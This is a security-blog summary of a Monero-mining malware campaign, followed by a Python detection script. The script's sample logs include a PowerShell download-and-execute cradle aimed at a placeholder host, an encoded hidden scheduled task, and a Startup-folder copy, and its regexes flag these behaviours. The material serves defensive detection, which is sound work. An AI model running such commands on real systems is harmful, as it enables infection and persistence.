Miner Malware Spreads Beyond China, Uses Multiple Propagation Methods Including EternalBlue, Powershell Abuse - TrendLabs Security Intelligence Blog
  • We detected malware that uses multiple propagation and infection methods to drop a Monero cryptocurrency miner onto as many systems and servers as possible.
  • Initially observed in China in early 2019, it previously infected networks by exploiting weak passwords and using the pass-the-hash technique, Windows admin tools, and brute-force attacks with publicly available code.
  • Once a machine is infected via one of these methods, the malware acquires the MAC address and collects information on the anti-virus products installed on the machine.
  • It leverages weak passwords in computer systems and databases, targets legacy software that companies may still be using, uses PowerShell-based scripts whose components are downloaded and executed in memory, exploits unpatched vulnerabilities, and installs itself using the Windows startup folder and the task scheduler.
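The behaviours summarised above (PowerShell components downloaded and run in memory, anti-virus enumeration, persistence via the task scheduler and the startup folder) can be turned into host-level detection logic. The following is an added example, not code from the original post or from Trend Micro; the log lines are constructed, the simplified "event-id host text" format and the regexes are assumptions for illustration.

```python
import re
from collections import defaultdict

# Constructed sample export (assumption): "<event_id> <host> <script block or command line>".
# 4104 = PowerShell script-block text, 4688 = process creation command line.
SAMPLE_LOGS = [
    "4104 host1 IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/a.ps1')",
    "4104 host1 Get-WmiObject -Namespace root/SecurityCenter2 -Class AntiVirusProduct",
    "4688 host1 schtasks.exe /create /sc minute /mo 5 /tn Update /tr powershell -w hidden -enc AAAA",
    "4688 host2 cmd.exe /c copy C:\\Users\\Public\\svc.exe C:\\Users\\bob\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svc.exe",
    "4688 host2 notepad.exe C:\\Users\\bob\\notes.txt",
    "4104 host2 Get-ChildItem C:\\Users",
]

# Behaviours from the post, each as (indicator name, regex). Illustrative patterns, not vendor signatures.
INDICATORS = [
    # download cradle piped into Invoke-Expression in either order: fetch then IEX, or IEX then fetch
    ("ps_download_exec", re.compile(
        r"(DownloadString|DownloadData|Invoke-WebRequest).*?(IEX|Invoke-Expression)"
        r"|(IEX|Invoke-Expression).*?(DownloadString|DownloadData|Invoke-WebRequest)", re.I)),
    # powershell launched with an encoded command (typical of in-memory stagers)
    ("ps_encoded_cmd", re.compile(r"powershell(\.exe)?\b.*\s-(e|enc|encodedcommand)\b", re.I)),
    # WMI query used to list installed anti-virus products
    ("av_enumeration", re.compile(r"root[/\\]SecurityCenter2.*AntiVirusProduct", re.I)),
    # persistence through the task scheduler
    ("schtask_persist", re.compile(r"schtasks(\.exe)?\s+/create\b", re.I)),
    # persistence through the per-user or all-users startup folder
    ("startup_folder", re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)),
]

def scan_line(text):
    """Names of every indicator matching one script block or command line."""
    return [name for name, rx in INDICATORS if rx.search(text)]

def scan_logs(lines):
    """Map host -> sorted list of distinct indicators seen; hosts with no hits are omitted."""
    hits = defaultdict(set)
    for line in lines:
        parts = line.split(" ", 2)
        if len(parts) < 3:
            continue  # malformed line; skip rather than crash the scan
        _event_id, host, text = parts
        hits[host].update(scan_line(text))
    return {host: sorted(names) for host, names in hits.items()}

def suspicious_hosts(lines, threshold=2):
    """Hosts where at least `threshold` distinct behaviours co-occur (chained, as in the post)."""
    return sorted(h for h, names in scan_logs(lines).items() if len(names) >= threshold)

if __name__ == "__main__":
    for host, names in scan_logs(SAMPLE_LOGS).items():
        print(host, names)
    print("escalate:", suspicious_hosts(SAMPLE_LOGS))
```

Requiring several distinct behaviours per host before escalating keeps a lone `schtasks /create` from an administrator out of the alert queue while still catching the download-then-persist chain.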